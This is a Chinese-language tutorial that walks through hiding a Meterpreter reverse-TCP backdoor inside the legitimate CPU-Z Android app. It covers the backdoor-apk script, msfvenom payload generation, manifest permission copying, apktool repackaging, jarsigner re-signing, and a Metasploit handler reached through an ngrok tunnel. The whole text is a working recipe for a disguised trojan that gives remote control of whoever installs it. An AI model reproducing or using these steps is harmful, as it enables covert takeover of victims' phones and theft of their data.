1.工具準備php
kali Linuxlinux
backdoorandroid
ngrok服務器一臺git
apktoolgithub
測試APP:cpu-z算法
2.處理環境服務器
apktool更新: https://ibotpeaches.github.io/Apktool/ 下載後更名爲apktool.jar 覆蓋掉原/usr/share/apktool/apktool.jariphone
backdoor下載:命令git clone https://github.com/dana-at-cp/backdoor-apk.git tcp
進入https://www.ngrok.cc,下載Linux 64位端口轉發工具,移動到桌面備用工具
終端進入桌面運行 : ./sunny clientid 隧道id
進入backdoor目錄: cd /backdoor-apk/backdoor-apk
下載cpu-z,更名爲1.apk,將1.apk拖到/backdoor-apk/apkdoor-apk
運行backdoor: 輸入 ./backdoor-apk.sh 1.apk,按此圖中輸入,將IP換爲ngrok域名,端口設爲ngrok端口
找到payload注入後的apk文件 /backdoor-apk/backdoor-apk/original/dist
更名爲2.zip 移動到根目錄下,用壓縮軟件打開。刪除META-INF文件,退出。而後再將2.zip改成2.apk
apktool進行反編譯: apktool d /root/2.apk 會生成一個2文件
更改權限:打開AndroidManifest.xml,用msfvenom -p android/meterpreter/reverse_tcp LHOST=10.161.94.25 LPORT=4444 -o obj.apk 命令生成一個木馬後門obj.apk,進行反編譯,打開AndroidManifest.xml將下圖所示代碼複製到 /root/2/AndroidManifest.xml 文件下相同位置(注意不能重複)
從新打包: 命令: apktool b /root/2 會在/root/2/dist下生成一個2.apk 已示區別更名爲3.apk並移動到根目錄
對打包文件進行簽名:
先生成簽名證書: 命令: keytool -genkey -alias android.keystore -keyalg RSA -validity 20000 -keystore android.keystore
參數說明:
-genkey 生成文件
-alias 別名
-keylog 加密算法
-validity 有效期
-keystore 文件名
簽名: 命令: jarsigner -verbose -keystore android.keystore -signedjar 3_signed.apk 3.apk android.keystore
參數說明:
-verbose 若是它出如今命令行中,則表明「verbose」模式,它使 jarsigner 在 JAR 簽名或校驗過程當中輸出額外信息。
-keystore 指定密鑰倉庫的路徑
-signedjar 指定用於已簽名的 JAR 文件的名稱。(覆蓋)
此時後門已添加完畢,下一步,打開 msf 控制檯,設置好監聽參數後,等待上線。打開終端,輸入命令 msfconsole,回車。進入 msf 控制檯。
輸入命令 use exploit/multi/handler,回車。
輸入 set PAYLOAD android/meterpreter/reverse_tcp,回車。
輸入 set LHOST 內網ip,回車。
輸入 set LPORT ngrok映射的本機端口,回車。
輸入exploit 啓動監聽
將apk文件安裝到安卓手機,大功告成,等待安卓機上線。
注意:若是你Kali linux的內網IP變了,能夠直接在ngrok修改爲你的內網IP而後在set LHOST設置成你內網IP而後run監聽便可。